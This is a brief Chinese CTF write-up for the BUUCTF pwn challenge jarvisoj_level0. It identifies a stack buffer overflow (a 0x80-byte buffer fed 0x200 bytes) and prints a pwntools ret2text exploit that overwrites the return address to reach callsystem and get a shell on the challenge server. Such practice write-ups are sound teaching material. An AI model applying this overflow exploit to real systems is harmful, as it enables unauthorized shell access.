BUUCTF-PWN-jarvisoj_level0

checksec

image-20211104174527495

IDA

image-20211104174606795

进入vulnerable_function函数

image-20211104174701846

可以看到buf的长度为0x80,但这个输入点可以输入0x200的长度,所以可以利用该溢出,跳转到callsystem函数,是典型的ret2text

image-20211104174910861

EXP

1
2
3
4
5
6
from pwn import *

p = remote('node4.buuoj.cn', 25713)
payload = b'a' * (0x80 + 0x8) + p64(0x400596)
p.sendline(payload)
p.interactive()

结果

image-20211104175033227